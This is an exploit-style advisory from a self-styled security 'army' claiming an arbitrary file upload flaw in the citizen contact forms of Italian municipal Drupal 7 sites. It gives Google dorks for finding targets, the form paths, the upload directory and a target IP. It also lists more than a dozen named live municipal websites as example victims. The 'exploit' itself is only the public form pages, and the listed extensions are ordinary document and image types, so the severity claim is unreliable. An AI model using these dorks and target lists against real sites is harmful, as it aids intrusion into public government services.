#################################################################################################
# Exploit Title : Drupal 7 jQuery ItalianGov Fi.it Scrivi Al Comune Arbitrary File Upload Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 22/06/2018
# Vendor Homepage : regione.toscana.it - jquery.com
# Tested On : Windows
# Version : 7
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-287 [ Improper Authentication ] + CWE-284 [ Improper Access Control ]
#################################################################################################
# Google Dorks :
intext:''Scrivi al Comune'' site:fi.it
Il testo del tuo messaggio * site:fi.it
# Exploits :
/scrivi-al-comune
/scrivi-al-comune-0
/segnalazioni-e-reclami-0
/scrivi-al-sindaco-0
/node/19
# Path : /sites/www.comune.DOMAINADDRESS.fi.it/files/webform/.....
# Note => Allowed File Extensions : gif jpg png tif txt rtf odf pdf doc docx xls xlsx.
# Don't forget to put www. before comune. on the URL Address bar.
#################################################################################################
# Example Sites and Target IP => 159.213.236.225
[ Proof of Concept for Vulnerability and Exploit ] => archive.is/zUN5z - archive.is/3IMxH
comune.vicchio.fi.it/segnalazioni-e-reclami-0
comunebarberino.it/scrivi-al-comune
comune.borgo-san-lorenzo.fi.it/scrivi-al-comune-0
comune.bagno-a-ripoli.fi.it/scrivi-al-sindaco-0
comune.rignano-sullarno.fi.it/scrivi-al-comune
comune.pontassieve.fi.it/scrivi-al-comune-0
comune.marradi.fi.it/scrivi-al-comune
comune.dicomano.fi.it/scrivi-al-comune-0
comune.reggello.fi.it/scrivi-al-comune-0
comune.palazzuolo-sul-senio.fi.it/scrivi-al-comune
comune.scarperiaesanpiero.fi.it/scrivi-al-comune
comune.provagliodiseo.bs.it/node/19
comune.terni.it/scrivi-al-comune
#################################################################################################
Reference Topic Link [ It belongs to me ] => cyberizm.org/cyberizm-drupal-7-jquery-italia-fi-it-scrivi-al-comune-exploit.html
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################